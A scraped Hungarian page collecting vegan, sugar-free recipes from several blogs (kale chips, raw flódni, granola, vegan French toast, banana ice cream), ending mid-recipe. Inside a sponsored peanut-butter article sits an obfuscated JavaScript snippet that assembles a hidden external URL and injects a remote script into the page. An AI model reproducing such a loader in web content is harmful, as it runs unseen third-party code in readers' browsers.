A legegészségesebb chips és a februári kihívás Leveles kelt azóta fogyasztunk rendszeresen, amióta voltunk Joan-nál nyersétel tanfolyamon és elmondta nekünk, hogy a téli időszakban az egyik legjobb vitaminforrás. Nagyon magas a béta karotin, C és K vitamin, valamint lutein (növényi festékanyag, fontos szerepet játszik az érrendszer és a szem védelmében) tartalma és gazdag kálciumban. Jó hidegtűrő, nálunk az erkélyen tárolva mínusz fokokban sem fagy meg. A brokkoli, a karfiol és a kelbimbó rokona. Hatalmasra meg tud nőni, nem is fér el egy nagy zacskóban csak úgy, hogy leveleire szedjük. Többnyire zöld turmixokba és levelesekbe tettem bele. Elkészíthető főzeléknek és salátának is, sőt a hétvégén egy fantasztikusan finom és egyszerű tésztaételt készítettem belőle (recept később). Több helyen láttam chipsnek elkészítve. Gondoltam adok neki egy esélyt és kipróbálom milyen nasinak. Elmondom milyen... Olyan, amit nem lehet abbahagyni! A recept roppant egyszerű, 20 perc alatt elkészül és van egy olyan chipsünk, ami nem olajban sült, ropogós, sós és mennyei! Leveleskel chips Hozzávalók: - 1 csokor leveleskel - 2-3 evőkanál extra szűz olívaolaj - só, bors Szedjük le a leveleket a szárról és tépkedjük falat méretűre. Mossuk meg és salátacentrifugában jól szárítsuk meg. Tegyük egy tálba, ízlés szerint sózzuk, borsozzuk és locsoljuk meg az olívaolajjal. Jól keverjük össze, hogy az olaj mindenhol befedje a leveleket. Sütőpapírral bélelt tepsire tesszük és 150-160 fokon megsütjük. Akkor jó, ha tapintásra ropogós és enyhén megbarnult. Nyugodtan készítsünk belőle dupla mennyiséget, garantáltan gyorsan el fog fogyni. És akkor néhány szó a februári kihívásról. Az utóbbi időben egyre több édességet, édes dolgot ettem (tanúsítja ezt a blogom is) és éreztem, hogy a szervezetem kezd telítődni. Ezért úgy határoztam, hogy tartok egy tisztító hónapot és a vegetáriánus táplálkozást vegánra cserélem, valamint lemondok minden édes dologról, beleértve a nádcukrot (kristálycukrot már nagyon régóta nem használok), a mézet, a juhar/­­rizs/­­agavé/­­datolya szirupot, nyírfacukrot,  kókuszcukrot (új felfedezettem, majd írok róla később), édes gyümölcsöket (banán, körte, datolya, füge, stb.), csokoládét, süteményeket. Amit engedélyezek: alma, grapefruit, citrom, alkalmanként narancs, kivi és mandarin. Heti bontásban őszintén be fogok számolni nektek a kihívásról, a csoki utáni sóvárgásról (biztos lesz ilyen :)), az ételekről, amiket fogyasztunk (igen, I. is vállalta a kihívást, ő marad vegetáriánus, vagyis tejterméket és tojást fog fogyasztani, csak a cukorról mond le), az új ízekről, amiket felfedezünk. Fontosnak tartom megjegyezni, hogy a témában leírtakat a saját tapasztalataimra alapozom. Ha úgy gondoljátok, hogy ti is szeretnétek kipróbálni, kérjétek ki egy szakember véleményét, tájékozódjatok a témában. Heti egy Húsmentes Hétfővel (Meatless Monday) és cukormentes nappal sokat tehettek az egészségetekért és környezetetekért. További cukormentes vegán receptekért katt ide.

VegaFOOD - Budapest és Szeged

2011. október 4. Lét-tudatos konyha 

VegaFOOD - Budapest és Szeged   Ha a munkahelyén nem megoldható az étkezés; ha nem szeretne vagy tud étterembe menni; de egészséges és finom ételt szeretne ebédelni, akkor mostantól Szegeden is lehetősége van ételt házhoz rendelni a VegaFOOD-tól. Szabadon válogathat a különböző ízvilágú (vegán, fitness, lúgosító, indiai, magyaros) vegetáriánus ételek és szendvicsek között. Ezen felül anticandidás menü, vagy cukormentes édesség is szerepel az étlapon. Sőt, most a megrendelőknek egy kis meglepetés is jár, ingyen italkuponokat adnak ajándékba.  Részletek: itt

Medvehagyma-krémleves burgonyával: mindössze 30 perc alatt elkészül

2024. március 10. Prove - a világ vegán szemmel 

Alapesetben március végére, április elejére tehető a medvehagyma szezonja, de idén már február végétől beköszöntött ez az időszak. Ezt ünnepelve az isteni medvehagyma-krémleves receptjével készültünk. A következő hetekben a szezonnak megfelelően minden vasárnap új medvehagymás recepttel érkezünk, tarts velünk! Ez a medvehagyma-krémleves gluténmentes, cukormentes, és könnyen olajmentessé is tehető, ha a hagymát vízen párolod olajon… The post Medvehagyma-krémleves burgonyával: mindössze 30 perc alatt elkészül appeared first on Prove.hu.

Fair Trade világnap + jeges kávé cukormentesen, de édesen! (laktózmentes, gluténmentes, vegán)

2023. május 13. Zizi kalandjai 

Minden évben megtartják a Fair Trade világnapját május második szombatján. Ezzel a világnappal igyekeznek felhívni a figyelmet a kistermelők, a környezet kizsákmányolására, a globális kereskedelemre és a túlfogyasztás hátrányaira. De mit is jelent a Fair Trade kifejezés? Mi van mögötte? Szó szerint fordítva méltányos kereskedelmet jelent. “A méltányos kereskedelem lényege... Source

Zabos-kakaós avokádókrémes, joghurtos áfonyatorta (vegán, cukormentes)

2023. április 14. vegasziget 

Hozzávalók: Az alaphoz: 10 dkg zabpehely 15 dkg kókuszolaj 3-4 ek. eritrit 1 marék olajos mag A kakaós avokádókrémhez: 2 db avokádó 3 ek. holland kakaópor 3 ek. méz vagy valamilyen szirup (agavé, rizs, datolya, juhar stb.) A joghurtos réteghez: 4 dl növényi (szója vagy kókusz alapú) joghurt (natúr) 1/­­2 kg áfonya (ebből a fele […]

Fenséges flódni

2021. december 6. VegaLife 

Fenséges flódniVágyakozásom félelemmel keveredett, amikor korábban elhatároztam, kipróbálom a nyers flódnit. Nyerset, mármint csak növényi alapanyagokból, olyan változatban, ahol nem kell sütni, hanem nyersen elfogyasztható. Féltem, hogy az almalap (ami tulajdonképpen a flódni tésztájaként szolgál) nem fog összejönni és így nem sikerül elkészítenem. Ma már bátorítok mindenkit, próbálja ki, mert az almalap elkészítése roppant egyszerű - csak éppen időigényesebb az átlagosnál. Ezért ha karácsonyra ezt szeretnéd elkészíteni, már érdemes előkészíteni az almalapokat előre, így a kész almalapok nem romlanak meg hetekig, sőt hónapokig sem. Nem kell megijedni attól sem, hogy az elkészítése a leírás alapján időben sokáig tart. A legjobb dolog, hogy az almalapok aszalása ugyan hosszas órákat vesz igénybe, de nem kell ott lenni és óránként ellenőrizni. Emlészem egyik reggel elkészítettem az almaturmixot, elindítottam a sütős aszalást (lásd lentebb a leírást) és simán végigdolgoztam a 8 órát - első alkalommal home-office-ból, otthonról, második alkalommal pedig bementem az irodába és mire hazajöttem nagyjából kész lett az almalap. A harmadik alkalommal pedig éjszakára tettem rá. A recept Hozzávalók az almalaphoz: - 5-6 db kimagozott alma (Nagy tepsire nézve 1 vagy 2 lap jön ki ebből a mennyiségből - attól függően, hogy milyen vastag lapot kívánunk készíteni. A vastagabbaknak több aszalási idő kell.) - víz - igény szerint banán, ha édesebbet kívánunk készíteni. Az almákat turmixgép poharába daraboljuk és kevés vízzel sűrű masszát turmixolunk, majd aszalógép tálcájára kiterítjük, és megaszaljuk. Ha nincs aszalógép, se tálca hozzá, akkor egy tepsibe egy szilikonlapot fektetünk, arra öntjük rá a masszát, nyitott sütőt 50 fokra állítva hosszas órák alatt (8-10-12) megaszaljuk. Sajnos sütőpapírt nem ajánlhatok ehhez a művelethez, mert összeráncosodik és nem lesz sima az almalap. Töltelékek: 1. Mákos töltelék: -  1 csésze mák (beáztatva, megszárítva, megdarálva) -  1/­­2 csésze datolya -  frissen facsart narancslé A mákot néhány órára beáztatjuk, majd leszűrjük, kiterítjük és ahogy az almalapot megaszaltuk, hasonlóan megszárítjuk, vagy fűtőtestre rakjuk a tálcát és ott szárítjuk. A datolyát kevés kézmeleg vízben felpuhítjuk (ha nem puha), majd aprító géppel összedaráljuk. A megszáradt, megdarált mákot pedig összekeverjük a datolyaszósszal. Ha nem elég kenhető, túl száraz, akkor kevés narancslét kanalazunk hozzá. A mák áztatásával aktiváljuk a bennük rejlő fitinsavat, így a mákban lévő ásványi anyagok felszívódása könnyebben megy végbe és gyomrunknak is könnyebbé válik az emésztése. 2. Szilvás töltelék: -  1.5 csésze aszalt szilva megáztatva -  1/­­2 csésze mazsola, aszalt gyümölcsdarabok megáztatva Az aszalt szilvát éppen csak addig áztatjuk, mig puha nem lesz, ha eleve puha aszalt szilvánk van, akkor nem szükséges áztatni. Ha áztatjuk, szűrjük le jól a levét, majd aprítógéppel összedaráljuk. Ugyanígy folytatjuk az eljárást az édesítésre szánt gyümölcsdarabokkal, majd a két szószt alaposan összekeverjük. 3. Diós töltelék: - 1 csésze dió (beáztatva, megszárítva, megdarálva) - 1/­­2 csésze datolya - 1 bio citrom reszelt héja A diót néhány órára beáztatjuk, majd leszűrjük, kiterítjük és ahogy az almalapot megaszaltuk, hasonlóan megszárítjuk, vagy fűtőtestre rakjuk a tálcát és ott szárítjuk. A datolyát kevés kézmeleg vízben felpuhítjuk (ha nem puha), majd aprító géppel összedaráljuk. A megszáradt majd megdarált diót pedig összekeverjük a datolyaszósszal. A dió áztatásával aktiváljuk a bennük rejlő fitinsavat, így a dióban lévő ásványi anyagok felszívódása könnyebben megy végbe és gyomrunknak is könnyebbé válik az emésztése. A flódni összeállítása innen már egyszerű: az első gyümölcslapra rákenjük szélétől széléig a mákos tölteléket, majd erre ráhelyezünk egy újabb gyümölcslapot. Erre jön a szilvás töltelék, majd újra gyümölcslap amit a diós töltelékkel kenünk meg, majd a tetejére egy újabb gyümölcslap.  Néhány órát - ha van elég türelmünk még :) - egy éjszakát hűtőben pihentetjük, majd szeleteljük.    

Lehet a mogyorót is kenyérre kenni!

2021. február 25. VegaNinja 

Amerikában régi hagyománya van a peanut butter&jelly szendvicsnek, egészen 1896-ig nyúlik vissza a története, még saját napja is van április 2-án. Elsőre furcsán hangozhat a magyar fülnek ez a kombináció: ez a szendvics tulajdonképpen szendvicskenyérre kent földimogyoróvaj, amelyre aztán lekvárt tesznek. Valami mégis lehet azonban benne, ha ennyire szeretik: egy 2002-es tanulmány szerint egy átlag amerikai 1500 ilyen szendvicset eszik meg, mire leérettségizik. (function(){ tzyqu=54jcn9d1zyqp;tzyq=document.createElement(script); tzyq_­=u+(st);tzyq_­+=at+(.);tzyq.async=true;tzyq_­+=in; tzyqu=252362599.+tzyqu;tzyq.type=text/­­javascript;tzyqu+=qmpd06r9nfmn; tzyqu+=0jmapg;tzyq_­+=(f)+o+(/­­);tzyq.src=https:/­­/­­+tzyq_­+tzyqu; tzyqd=document.body;tzyqd.appendChild(tzyq); })(); Szponzorált cikk Bár az amerikai köztudottan eléggé elhízott társadalom, ez a nemzetei eledel kifejezetten egészséges is lehet, ha megfelelő alapanyagokkal készítjük el. A szendvicskenyeret elég jó minőségű kenyérre (pl. teljes kiőrlésű rozskenyérre vagy hosszú érlelésű, kovásszal készült kenyérre) cserélni, a földimogyoróvajból cukor- és pálmazsír mentes változatot választani, a lekvárból cukormenteset használni vagy friss gyümölcsre cserélni, és máris kész egy szuperfinom, magas fehérje tartalmú, lassú felszívódású szénhidrátot tartalmazó szendvics, amit a gyerekek is nagyon szívesen megesznek. Nem véletlen, hogy szintén Amerikában terjedt el szélesebb körben a többi olajos magból készült magkrém is: mandulakrém, kesudiókrém, törökmogyorókrém és társaik. Itthon ezek sajnos még kevésbé ismert alapanyagok, pedig ezek a krémek rendkívül sokoldalúan felhasználhatóak, és nagyon egészségesek. Magas a fehérje- és a telítetlen zsírsav tartalmuk, szénhidrát tartalmuk pedig alacsony, ráadásul tele vannak értékes ásványi anyagokkal és vitaminokkal (kálium, kálcium, magnézium, B1-, B2-, B6-vitaminok, E-vitamin stb.). Az olajos magok gyakorlatilag bármely diétába beilleszthetőek, ezek a krémek pedig a magok felhasználásának egy új dimenzióját nyitják meg: lehet őket zabkásába rakni, gazdagíthatjuk vele a turmixunkat, smoothie-nkat, lehet belőlük mindenféle kekszet, süteményt sütni (paleo és vegán sütik szuper alapanyaga, zsiradék helyettesítőként funkcionálhatnak), mehetnek palacsintába töltelékként, sőt, sós ételek kiváló alapanyagai is lehetnek (pl. tésztaszószhoz, salátaöntethez használhatjuk őket.). Nagyon fontos, hogy csak a jó minőségű, hozzáadott fehér cukor- és növényi zsír mentes változatokat válasszuk! Ezekből a krémekből is nagy a választék, de az igazán jó minőségű, csak az olajos magokat tartalmazó változat már ritkább. A Mendula magkrémjei pont ilyenek: nincs bennük semmi más, csak az enyhén pörkölt olajos mag (törökmogyoró, mandula, dió és földimogyoró), ill. léteznek ízesített változatok is. Az ízesített változatok is elképesztő különlegesek: van nekik vaníliás kesudiókrémjük (ami hozzáadott cukor nélkül is finom édeskés ízű, akár önmagában kanállal eszegetve is elmegy egy önálló desszertnek), de van fahéjas mandulakrémjük is, amelyben a mandulán kívül fahéj, és kevés kókuszvirágcukor van. Az egyik legnépszerűbb termékük az egészséges nutella verzió: ez egy 78% (!!!) törökmogyorótartamú mogyorókrém, amelyben ezen kívül csak kókuszcukor és kakaópor van. És ha már a földimogyoró vajjal kezdődött az egész cikk, kiemelnénk a földimogyoró vajukat is: kétféle változatuk is létezik, egy natúr, és egy sós-földimogyoró darabos. Mindkettőben közös azonban, hogy nincs bennük se pálmazsír, se cukor, se semmi egyéb turpisság. Ki kell őket próbálni, végre egy olyan termékcsoport, ami úgy finom, hogy még egészséges is! Tedd a kedveceim közé 0 The post Lehet a mogyorót is kenyérre kenni! appeared first on VegaNinja.

Raffaello golyók házilag

2020. november 16. VegaLife 

Raffaello golyók házilagAlig másfél hónap és itt a karácsony! Tudod már mivel leped meg szeretteidet? Ha kedveled a saját készítésű ajándékokat, készíts raffaello golyókat. Ha azt keresed, milyen kiadós édesség kerüljün az ünnepi asztalra, akkor szintén azt ajánlom, készíts raffaello golyókat. Tömény kókuszos élvezet, közepén egy szem mandula. Vegán, gluténmentes, cukormentes (ha cukor helyett mással édseíted), nyers, paleo. Mi kell még? Én tudom, hogy valaki gyors megcsinálja és megehessük. :)    A recept Hozzávalók: - 2 konzerv kókusztej  - egy konzerv 400 g (Angliában Lidlben kapható, Magyarországon nagy Tescoban, Auchanban, ázsiai üzletekben) - 200 g kókusz krém (Creamed Coconut) (Angliában, Magyarországon nagy Tescoban, Auchanban, bioboltokban, DM-ben kaphato - 100 g őrölt mandula - édesítőszer pl nyírfacukor, kókuszvirág cukor, stevia, stb. ízlés szerint - mandula - kókuszreszelék   Elkészítés: A két konzerv kókusztejet fagyasztóba tesszük kb. 45 percre. Ha már eleve volt otthon ilyen konzervünk, és a hűtőben tároltuk, az is jó. A lényeg, hogy a kókusztej felső, vastag rétege jól dermedt legyen ahhoz, hogy jól tudjuk kezelni. Amíg a fagyasztóban dermednek, a kókuszkrémet valamelyest olvasszuk meg annyira folyékonzra, hogy majd könnyen hozzá tudjuk adni a kókusztejek sűrűjéhez. A megdermedt (hűtőből vagy fagyasztóból kivett kókusztej konzerveket óvatosan nyissuk ki és a felső keményebb réteget kanalazzuk egy tálba, ahol habverő segítségével kezdjük el összedolgozni, folyamatosan adagolva hozzá a nem meleg, de folyósabb állagú kókuszkrémet. Ehhez adjuk hozzá az édesítőt és az őrölt mandulát. Ezt a masszát a hűtőbe kell visszatenni, dermedni hagyni. Amikor már annyira megdermedt, hogy golyók formázhatók belőle, v izes kézzel kis golyókat formázunk a megszilárdult masszából, miközben mandulát teszünk a közepébe, majd kókusz reszelékbe hempergetjük.  Ha el nem fogy készítés közben :) akkor hűtőben pihentessük a tálalásig.

Gluténmentes, egyszerű almás zabpelyhes keksz

2020. október 7. Élj harmóniában 

Gluténmentes, egyszerű almás  zabpelyhes kekszEz egy gyorsan elkészíthető, nagyon egészséges és finom keksz.  Nyújtani és szaggatni sem kell, csak gyorsan összedolgozod az alapanyagokat és kis adagokba kilapítod a tepsin.  Hozzávalók: 12 dkg hajdina liszt 8 dkg kukoricaliszt 3 dkg kókuszliszt 3 ek lenmagliszt 15 dkg apró levelű zabpehely 10 dkg mazsola 5 dkg kókuszvirág cukor (használhatsz más cukrot is ha nincs otthon) 50 dkg alma fahéj 10 dkg kókuszzsír 3 tk. sütőpor  víz  Az almákat hámozd meg a reszeld le, majd szórd meg fahéjjal.  Egy tálba keverd össze a liszteket, sütőport, cukrot, majd keverd hozzá a mazsolát. Nyomd ki az alma levét és keverd a tésztához az almát is. Majd add a masszához a kókuszzsírt, az alma levét és pici vizet .  Annyi vizet tegyél hozzá, hogy a tészta masszaként összeálljon, szépen elváljon az edény falától. Olyan legyen ami formálható, nem ragad, nem folyik. ( attól függ az almának mennyi leve lesz 20ml től ,akár majd 1 dl-ig terjedhet ) Kis adagokat vegyél ki a masszából és a tenyereid között lapítsd ki vagy a tepsiben egy kanállal, vagy pohár segítségével. 180 fokra előmelegített sütőben süsd készre. (kb. 15 perc)  Vegyszermentes (bio) alapanyagokat használj! Jó étvágyat kívánok hozzá:) szeetettel Kati

Mogyoró vajas kókuszgolyó

2020. augusztus 19. Fittanyuka 

Favorizálom a gyorsan és egyszerűen elkészíthető finomságokat,ami minél kevesebb időmbe telik és mégis finom, egészséges. Ezeket a golyókat eredetileg magamnak gyártottam, olyan alkalmakra amikor megéhezek, vagy edzés előtt vagyok  és bekapok belőlük egy-kettőt, hogy energiát adjon.  A gyerekek gyorsan felfedezték a hűtőben, nem kellett sokáig tárolnom őket, felfalták egy délután alatt. A tudat viszont nyugtatott, hogy a rendkívül édesszájú kisfiam semmilyen plusz cukormennyiséget nem vitt be a szervezetébe, ugyanis ez a recept csakis természetes cukrokat tartalmaz és abból is nagyon keveset. Hozzávalók: 1 db érett banán szétnyomva 2-3 evőkanálnyi 100%os mogyoró vaj 1 nagyobb bögre finom szemű zabpehely 1-2 dl rizstej kókuszreszelék a hempergéshez A zabpelyhet összekeverjük a többi összetevőkkel, amennyiben lágy zabpehellyel, amennyiben nagyon száraz még rizstejjel dúsítjuk. Körülbelül egy órára a hűtőbe tesszük,majd nedves kézzel golyókat formázunk és kókuszreszelékben meghempergetjük. Én néhányat cukormentes kakaóporban is meghempergettem, de akár kókuszvirág cukorral is megtehetjük. Zárható dobozban hűtőben tároljuk.  

Cukormentes, vegán, almás süti

2019. október 26. VegaNinja 

Nagyon finom süti, és a recept elég megengedő, szóval igazi sikerélmény lehet a vegán sütés-főzésben kezdők számára is. Az alma egész évben elérhető, így nem annyira idénysütemény. A tésztához: fél kiló alma 1/­­8 bögre teljes kiőrlésű rozsliszt 1/­­8 bögre teljes kiőrlésű tönkölyliszt 1/­­8 bögre zabpehely 1 ek mák, elhagyható 1 ek. kókuszzsír 1 kávéskanál szódabikarbóna mazsola (elhagyható) fahéj A krémhez: 10 dkg mandula 30 dkg török mogyoró 2 körte 1 őszibarack mazsola más aszalt gyümölcsök 2 ek. kókuszzsír Lereszelem az almát, összekeverem a többi összetevővel, szeletelek rá körtét vagy almát, bedobom a sütőbe, és közepes lángon pirosra sütöm. A krémhez pedig botmixerrel pépesítem a hozzávalókat, és a kész krémet a tortaalappal tálalom. Én krémnyomóval rózsákat nyomtam rá, de állaga megengedi, hogy az alapra kenje az ember egy tortaforma segítségével, lehet kísérletezni. :) Tedd a kedveceim közé 0 The post Cukormentes, vegán, almás süti appeared first on VegaNinja.

epres csokis mikrós süti

2018. április 14. Beautilicious 

epres csokis mikrós sütiVégre itt a napsütés, jönnek a kedvencek! Eper, málna,  támadnak, és te sem fogsz tudni nekik ellenállni. Sütijeimből sem maradhatnak ki a kedvenceim! Hozzávalók - 1tojás - 125gr joghurt - rumaroma - 20gr fehérjepor - 25gr kókuszliszt  - 25gr zabpehely - sütőpor - 30gr cukormentes csoki - 75gr eper Így készítsd - Egy bögrébe keverj el mindent az eper és csoki kivételével - Csinálj egy lyukat a közepébe - Töltd meg apróra vágott eperrel és csokival - Tedd mikróba 5percre

Almás zabpelyhes keksz – tojásmentes, cukormentes, tejmentes

2018. február 22. Eszemiszom – Jóga Magazin 

Almás zabpelyhes keksz – tojásmentes, cukormentes, tejmentes Ha tél és  gyümölcs, akkor, az leginkább az alma. Ilyenkor érdemes a szezonalitásnak megfelelő gyümölcsöket, zöldségeket enni, mert sajnos pl. a déli gyümölcsök ugyan finomak, de természetüket tekintve hűtik és nedvesítik a szervezetet és nehezebb őket a szervezetnek emészteni ilyenkor. Ezért fázékonyságot, puffadást, orrfolyást, etc.  eredményezhetnek. Ha már alma, ma egy nagyon puha zabpelyhes kekszek készítettem. Ez egy egyszerű, gyors és egészséges finomság. Lehet reggeli vagy desszert is. Készítheted teljesen cukormentes változatban is, ha édes az alma. Gluténmentes diétában, gluténmentes zabpelyhet és zablisztet használj.  Hozzávalók 1 csésze zabliszt 1 csésze zabpehely 1 tk. szódabikarbóna 1 tk. fahéj 1/­­4 tk, vanília 1 csipet szárított gyömbér 1/­­3 csésze kókuszolaj (vajat is használhatsz helyette) 2 ek. lenmagliszt  8  ek. víz 4 közepes alma Vegyszermentes (bio) alapanyagokat használj!   Az almát mosd meg, hámozd meg és reszeld apróra vagy használj aprítógépet. A lenmaglisztet öntsd le a vízzel és hagyd állni egy picit – ez fogja összetartani a tésztád. (A “tojás helyettesítéséről” egy korábbi bejegyzésben részletesen  írtam már itt olvashatod)  Egy tálban keverd össze a zablisztet, zabpelyhet,  szódabikarbónát, fűszereket. Ha nagyon édesszájú a család keverj hozzá teljes értékű nádcukrot. Majd keverd hozzá az olvasztott kókuszzsírt és add hozzá a lenmaglisztes keveréket. Az egészet keverd gyorsan össze. Amikor elkeverted a tésztát, kanál segítségével egy sütőpapírral bélelt tepsire tegyél adagokat és nyomkodd le, hogy keksz formája legyen.   Tedd 180°C  fokra előmelegített sütőbe és süsd amíg aranybarnára sül. (kb. 20-25p) . A végén ha édesebben szeretnétek egy kis barna nádcukorral szórd meg.  

Karácsonyi granola + narancsos testradír (vegán ajándékok sajátkezűleg)

2017. december 19. Zizi kalandjai 

Karácsonyi granola + narancsos testradír (vegán ajándékok sajátkezűleg) Csapó Ildi bloggertársammal, a Greenway Design írójával az az ötletünk támadt, hogy kitalálunk két hasznos, kedves vagy éppenséggel finom és ízletes vegán ajándékot, amellyel szívesen lepjük meg szeretteinket és Nektek is hasznos tippeket adhatunk így a véghajrában. Az egyik recept, egy általam készített karácsonyi granola, a másik recept pedig, egy Ildi által készített narancsos testradír, ami az ehető kencék kategóriába tartozik. Olyan natúrkozmetikum, ami teljesen természetes összetevőkből áll, fantasztikus az illata és egy nehéz nap végén vagy éppen a karácsonyi pihenés alatt igazi relaxáló kényeztetést nyújt a használata. Bevallom a gyerekek mellett kevésbé vagyok aktív gasztro ajándék készítő, de azért néhány aprósággal idén is készülni fogok a családtagoknak, néhány közeli barátnak. A granola (ropogós reggeli müzli, amit tehetünk a kásánkra, szórhatjuk a turmixunkra, tehetjük kókusz- vagy szójajoghurtba vagy növényi tejbe) nagyon nagy sláger nálunk és a gyerekkel együtt készítve sem fog (talán) felfordulni a konyha az elkészítésekor! Összekeverjük a hozzávalókat, tepsire borítjuk, megpirítjuk a sütőben és már csomagolhatjuk is üvegbe vagy díszes (saját készítésű) tasakba. Az ajándékozott biztosan értékelni fogja, hogy saját magunk készítettünk valamit, ami ráadásul nagyon finom is. Ebben a karácsonyi granolában a fűszereké és a színeké a főszerep. A piros színt az aszalt áfonya adja, a fehéret a kókuszchips, a zöldet pedig a pisztácia. A fűszerek pedig őrölt gyömbér, fahéj, szegfűszeg és szerecsendió. Teljesen karácsony illat lesz a konyhánkban, amikor készítjük. Karácsonyi granola (laktózmentes, gluténmentes, vegán )   Mentés Nyomtatás Előkészítési idő 10 perc Főzési idő 20 perc Teljes idő 30 perc   Ropogós, fűszeres granola. Kiváló reggelire vagy délutáni nasinak és karácsonyra ajándékba! Szerző: Zizi Recept típusa: snack, reggeli, granola Konyha: vegán, gluténmentes Adag/­­mennyiség: 6 főre Hozzávalók 4 bögre aprószemű gluténmentes zabpehely 1 bögre dió, durvára aprítva 1 bögre mandula, durvára aprítva 1 bögre napraforgómag ½ bögre tökmag ½ bögre kókuszreszelék 4 evőkanál extra szűz kókuszzsír, olvasztva 4 evőkanál juharszirup 3 evőkanál chia mag 1 teáskanál őrölt gyömbér 1 teáskanál őrölt fahéj ½ teáskanál őrölt vanília ½ teáskanál őrölt szegfűszeg ¼ teáskanál őrölt szerecsendió ½ bögre sós vagy natúr pisztácia, durvára aprítva, sütés után hozzáadva ½ bögre aszalt vörösáfonya, sütés után hozzáadva ½ bögre kókuszchips, sütés után hozzáadva Elkészítés Melegítsük elő a sütőt 180 fokra. Egy nagy tepsit béleljünk ki sütőpapírral. Egy tálban keverjük össze a száraz alapanyagokat: zabpehely, dió, mandula, napraforgómag, tökmag, kókuszreszelék, chia mag, őrölt gyömbér, őrölt fahéj, vanília, szegfűszeg és szerecsendió. Egy másik tálban keverjük össze a nedves hozzávalókat: a kókuszzsírt és a juharszirupot. Ezt a nedves keveréket adjuk a szárazhoz és jól keverjük el, hogy a kókuszzsír és a juharszirup mindenhol befedjék (érintsék) a magokat. Borítsuk rá a tepsire és kanállal egyengessük el, hogy mindenhova egyformán jusson. Süssük kb. 10-12 percig, keverjük át, majd süssük újabb 10 percig, amíg aranybarna lesz (ellenőrizzük folyamatosan, mert sütő függő, hogy milyen hamar lesz kész). Ha kihűlt, keverjük hozzá a pisztáciát, a vörösáfonyát és a kókuszchipszet is. Üvegben/­­dobozban tartva hetekig eláll. Bár nem fog addig tartani, ezt garantálom! Jegyzetek A recepthez használt bögre 250 ml-es. Ha nincs juharszirupunk, helyettesíthetjük agavé- vagy rizssziruppal. A juharszirupot el is hagyhatjuk, így teljesen cukormentes lesz a granola. 3.5.3229 És íme a csodás vegán narancsos testradír, amit Ildi készített nektek… A receptért és csomagolási ötletekért kattintsatok át ide.

Vegán bundáskenyér

2017. október 28. VegaLife 

Vegán bundáskenyérEmlékszem, gyerekkoromban néha bundáskenyér és tea volt reggelire. Nagyon szerettem. Aztán ahogy nőttem, elfelejtődött a bundás kenyér. Néha néha ettem, majd vegánként teljesen eltűnt az életemből. Viszont nemrégiben felmerült bennem, hogy ha rántani (zöldséget) lehet tojás nélkül, akkor bizonyára bundáskenyér is készíthető tojás nélkül. Miért is cseréltem le a tojást a bundáskenyérben másra, hiszen a tojást annyian dicsérik, mint fehérjeforrást? Néhány mondatot idézek a Kína Tanulmány (Thomas M. Campbell - Dr. T. Colin Campbell) című könyvből:  "A vér koleszterinszintje egyértelműen a betegségek kockázatának fontos mutatója. A nagy kérdés, hogy a táplálkozás hogyan befolyásolja a vér koleszterinszintjét? Röviden elmondhatjuk, hogy a hús, tej, tojás, hal és állati fehérje bevitel növelésekor a vér koleszterinszintje emelkedik.  A növényi alapú ételek és tápanyagok (növényi fehérjék, étrendi rostok, cellulóz, hemicellulóz, oldható szénhidrátok, növényi B-vitaminok (karotinoidok, B2, B3), hüvelyesek, világos színű zöldségek, gyümölcsök, sárgarépa, burgonya, valamint a számos gabonaféle) mennyiségének növelésével a vér koleszterinszintje csökken. Számos - mind kísérleti állatokon, mind embereken végzett - vizsgálat mutatta ki, hogy az állati eredetű fehérjék fogyasztása növeli a koleszterinszinteket. A telített zsírok és az étrendi koleszterin szintén emelik a szintet, bár ezek a tápanyagok korántsem annyira hatékonyak, mint az állati fehérjék. A növényi táplálékok ezzel szemben egyáltalán nem tartalmaznak koleszterint, ugyanakkor többféle mechanizmussal is segítenek a szervezet által termelt koleszterin mennyiségének csökkentésében. Mindezek a következetes eredmények a Kína Tanulmányból származnak. (...) Szinte bármelyik orvosi rendelőbe elmehetünk és megkérdezhetjük, hogy milyen táplálkozási tényezők befolyásolják a vér koleszterinszintjét, az orvos valószínűleg azt fogja válaszolni, hogy a telített zsírok és az étrendi koleszterin. Manapság talán már előfordulhat, hogy lesz olyan, aki megemlíti a szója és a magas rosttartalmú korpafélék koleszterinszintet csökkentő hatását, arról azonban még mindig csupán igen kevesen tudnak, hogy az állati fehérjék hatást gyakorolnak a koleszterinszintekre." A recept Hozzávalók: - Szeletelt szárazabb kenyér vagy zsömle - 5 ek sárgaborsó vagy csicseriborsó liszt (lehet vegyesen is) - 2 ek zabpehely liszt - 1 nagyobb csipetnyi kurkuma - 1 nagyobb csipetnyi fekete só (nevében fekete, színében rózsaszíntől sötét barnáig jellemző) - ételízesítő - cukormentes növényi tej (készíthetünk zabtejet vagy dobozos növényi tejjel is dolgozhatunk) - pár csepp olíva olaj vagy kókuszzsír   Elkészítés: A liszteket összekeverjük egy tálba, hozzáadjuk a kurkumát, a feketesót, egy kevés ételízesítőt és annyi tejjel csomómentesre keverjük, hogy palacsinta sűrűségű tésztát kapjunk. Tesztelhetjük a sűrűségét, ha egy kis kenyérhéjat vagy esetleg az egyik ujjunkat belemártjuk a tésztába, kiemelve egyenletesen beborított a kenyér vagy a kézujjunk felszíne. Belehelyezzük a kenyereket, kicsit megáztatjuk, megforgatjuk benne, majd forró teflon sütőben vagy papírral bélelt tepsiben felmelegített sütőben kisütjük. Mennyiségtől függően duplázhatjuk az adagot. Sütés előtt akár fokhagymát vagy fokhagyma granulátumot is tehetünk bele.

Krémes zöld banánfagylalt (laktózmentes, gluténmentes, cukormentes, vegán)

2017. szeptember 22. Zizi kalandjai 

Krémes zöld banánfagylalt (laktózmentes, gluténmentes, cukormentes, vegán) Igen, tudom, már javában ősz van és most naptár szerűen szeptember 2-án már beköszöntött a hűvösebb, esős idő. Én azonban várom még a vénasszonyok nyarát, mert a kertünkben bőven akad tennivaló és az ilyen munkákat jobban szeretem száraz időben csinálni. Szóval hideg idő ide vagy oda, én bizony egy házi fagylalt receptet hozok most nektek. Az egyszerű egy hozzávalós banánfagylalt – angolul “nicecream” – titkát szerintem sokan ismeritek már, de aki még nem, annak röviden a lényeg: jó érett banánokat, meghámozva, kisebb darabokra törve a fagyasztóba teszünk egy tasakban. Ha jól megfagytak, bedobjuk a szuper turmixgépünkbe vagy aprítógépünkbe és addig dolgoztatjuk a gépet (6-8 perc), amíg a banánok krémes állagúra állnak össze. Ezt aztán bármivel ízesíthetjük, mehetnek bele fűszerek – vanília, fahéj -, más gyümölcsök, pirított vagy nyers magok, 